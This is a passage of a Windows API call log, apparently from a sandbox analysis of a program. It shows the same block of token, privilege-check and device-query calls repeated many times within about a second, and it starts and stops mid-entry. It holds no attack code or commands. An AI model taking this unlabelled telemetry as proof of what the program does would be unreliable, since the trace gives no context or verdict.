(dwErrCode=0x522) [0084.857] CloseHandle (hObject=0x114) returned 1 [0084.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.857] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.857] GetLastError () returned 0x578 [0084.857] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.857] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.857] GetCurrentThread () returned 0xfffffffe [0084.857] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.857] GetLastError () returned 0x3f0 [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.857] SetLastError (dwErrCode=0x522) [0084.857] CloseHandle (hObject=0x114) returned 1 [0084.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.857] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.857] GetLastError () returned 0x578 [0084.857] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.857] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.857] GetCurrentThread () returned 0xfffffffe [0084.857] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.857] GetLastError () returned 0x3f0 [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.857] SetLastError (dwErrCode=0x522) [0084.857] CloseHandle (hObject=0x114) returned 1 [0084.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.857] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.857] GetLastError () returned 0x578 [0084.857] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.857] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.857] GetCurrentThread () returned 0xfffffffe [0084.857] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.857] GetLastError () returned 0x3f0 [0084.857] GetCurrentProcess () returned 0xffffffff [0084.857] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.857] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.857] SetLastError (dwErrCode=0x522) [0084.857] CloseHandle (hObject=0x114) returned 1 [0084.857] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.858] GetLastError () returned 0x578 [0084.858] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.858] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.858] GetCurrentThread () returned 0xfffffffe [0084.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.858] GetLastError () returned 0x3f0 [0084.858] GetCurrentProcess () returned 0xffffffff [0084.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.858] SetLastError (dwErrCode=0x522) [0084.858] CloseHandle (hObject=0x114) returned 1 [0084.858] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.858] GetLastError () returned 0x578 [0084.858] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.858] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.858] GetCurrentThread () returned 0xfffffffe [0084.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.858] GetLastError () returned 0x3f0 [0084.858] GetCurrentProcess () returned 0xffffffff [0084.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.858] SetLastError (dwErrCode=0x522) [0084.858] CloseHandle (hObject=0x114) returned 1 [0084.858] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.858] GetLastError () returned 0x578 [0084.858] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.858] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.858] GetCurrentThread () returned 0xfffffffe [0084.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.858] GetLastError () returned 0x3f0 [0084.858] GetCurrentProcess () returned 0xffffffff [0084.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.858] SetLastError (dwErrCode=0x522) [0084.858] CloseHandle (hObject=0x114) returned 1 [0084.858] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.858] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.858] GetLastError () returned 0x578 [0084.858] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.858] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.858] GetCurrentThread () returned 0xfffffffe [0084.858] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.858] GetLastError () returned 0x3f0 [0084.858] GetCurrentProcess () returned 0xffffffff [0084.858] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.858] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.859] SetLastError (dwErrCode=0x522) [0084.859] CloseHandle (hObject=0x114) returned 1 [0084.859] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.859] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.859] GetLastError () returned 0x578 [0084.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.859] GetCurrentThread () returned 0xfffffffe [0084.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.859] GetLastError () returned 0x3f0 [0084.859] GetCurrentProcess () returned 0xffffffff [0084.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.859] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.859] SetLastError (dwErrCode=0x522) [0084.859] CloseHandle (hObject=0x114) returned 1 [0084.859] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.859] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.859] GetLastError () returned 0x578 [0084.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.859] GetCurrentThread () returned 0xfffffffe [0084.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.859] GetLastError () returned 0x3f0 [0084.859] GetCurrentProcess () returned 0xffffffff [0084.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.859] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.859] SetLastError (dwErrCode=0x522) [0084.859] CloseHandle (hObject=0x114) returned 1 [0084.859] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.859] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.859] GetLastError () returned 0x578 [0084.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.859] GetCurrentThread () returned 0xfffffffe [0084.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.859] GetLastError () returned 0x3f0 [0084.859] GetCurrentProcess () returned 0xffffffff [0084.859] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.859] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.859] SetLastError (dwErrCode=0x522) [0084.859] CloseHandle (hObject=0x114) returned 1 [0084.859] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.859] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.859] GetLastError () returned 0x578 [0084.859] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.859] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.859] GetCurrentThread () returned 0xfffffffe [0084.859] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.860] GetLastError () returned 0x3f0 [0084.860] GetCurrentProcess () returned 0xffffffff [0084.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.860] SetLastError (dwErrCode=0x522) [0084.860] CloseHandle (hObject=0x114) returned 1 [0084.860] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.860] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.860] GetLastError () returned 0x578 [0084.860] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.860] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.860] GetCurrentThread () returned 0xfffffffe [0084.860] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.860] GetLastError () returned 0x3f0 [0084.860] GetCurrentProcess () returned 0xffffffff [0084.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.860] SetLastError (dwErrCode=0x522) [0084.860] CloseHandle (hObject=0x114) returned 1 [0084.860] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.860] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.860] GetLastError () returned 0x578 [0084.860] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.860] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.860] GetCurrentThread () returned 0xfffffffe [0084.860] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.860] GetLastError () returned 0x3f0 [0084.860] GetCurrentProcess () returned 0xffffffff [0084.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0084.860] SetLastError (dwErrCode=0x522) [0084.860] CloseHandle (hObject=0x114) returned 1 [0084.860] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0084.860] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0084.860] GetLastError () returned 0x578 [0084.860] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0084.860] GetPriorityClass (hProcess=0x0) returned 0x0 [0084.860] GetCurrentThread () returned 0xfffffffe [0084.860] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0084.860] GetLastError () returned 0x3f0 [0084.860] GetCurrentProcess () returned 0xffffffff [0084.860] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0084.860] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.064] SetLastError (dwErrCode=0x522) [0085.064] CloseHandle (hObject=0x114) returned 1 [0085.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.064] GetLastError () returned 0x578 [0085.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.064] GetCurrentThread () returned 0xfffffffe [0085.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.064] GetLastError () returned 0x3f0 [0085.064] GetCurrentProcess () returned 0xffffffff [0085.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.064] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.064] SetLastError (dwErrCode=0x522) [0085.064] CloseHandle (hObject=0x114) returned 1 [0085.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.064] GetLastError () returned 0x578 [0085.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.064] GetCurrentThread () returned 0xfffffffe [0085.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.064] GetLastError () returned 0x3f0 [0085.064] GetCurrentProcess () returned 0xffffffff [0085.064] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.064] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.064] SetLastError (dwErrCode=0x522) [0085.064] CloseHandle (hObject=0x114) returned 1 [0085.064] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.064] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.064] GetLastError () returned 0x578 [0085.064] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.064] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.064] GetCurrentThread () returned 0xfffffffe [0085.064] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.064] GetLastError () returned 0x3f0 [0085.065] GetCurrentProcess () returned 0xffffffff [0085.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.065] SetLastError (dwErrCode=0x522) [0085.065] CloseHandle (hObject=0x114) returned 1 [0085.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.065] GetLastError () returned 0x578 [0085.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.065] GetCurrentThread () returned 0xfffffffe [0085.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.065] GetLastError () returned 0x3f0 [0085.065] GetCurrentProcess () returned 0xffffffff [0085.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.065] SetLastError (dwErrCode=0x522) [0085.065] CloseHandle (hObject=0x114) returned 1 [0085.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.065] GetLastError () returned 0x578 [0085.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.065] GetCurrentThread () returned 0xfffffffe [0085.065] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.065] GetLastError () returned 0x3f0 [0085.065] GetCurrentProcess () returned 0xffffffff [0085.065] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.065] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.065] SetLastError (dwErrCode=0x522) [0085.065] CloseHandle (hObject=0x114) returned 1 [0085.065] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.065] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.065] GetLastError () returned 0x578 [0085.065] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.065] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.065] GetCurrentThread () returned 0xfffffffe [0085.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.066] GetLastError () returned 0x3f0 [0085.066] GetCurrentProcess () returned 0xffffffff [0085.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.066] SetLastError (dwErrCode=0x522) [0085.066] CloseHandle (hObject=0x114) returned 1 [0085.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.066] GetLastError () returned 0x578 [0085.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.066] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.066] GetCurrentThread () returned 0xfffffffe [0085.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.066] GetLastError () returned 0x3f0 [0085.066] GetCurrentProcess () returned 0xffffffff [0085.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, pfResult=0x18fe54) returned 1 [0085.066] SetLastError (dwErrCode=0x522) [0085.066] CloseHandle (hObject=0x114) returned 1 [0085.066] SendMessageA (hWnd=0x0, Msg=0x1006, wParam=0x0, lParam=0x18ed34) returned 0x0 [0085.066] CM_Get_Device_Interface_List_SizeA (in: pulLen=0x0, InterfaceClassGuid=0x0, pDeviceID=0x0, ulFlags=0x0 | out: pulLen=0x0) returned 0x3 [0085.066] GetLastError () returned 0x578 [0085.066] CM_Get_Hardware_Profile_InfoA (in: ulIndex=0x0, pHWProfileInfo=0x0, ulFlags=0x0 | out: pHWProfileInfo=0x0) returned 0x3 [0085.066] GetPriorityClass (hProcess=0x0) returned 0x0 [0085.066] GetCurrentThread () returned 0xfffffffe [0085.066] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x2000000, OpenAsSelf=0, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x0) returned 0 [0085.066] GetLastError () returned 0x3f0 [0085.066] GetCurrentProcess () returned 0xffffffff [0085.066] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x18fe80 | out: TokenHandle=0x18fe80*=0x114) returned 1 [0085.066] PrivilegeCheck (in: ClientToken=0x114, RequiredPrivileges=0x18f774, pfResult=0x18fe54 | out: RequiredPrivileges=0x18f774, 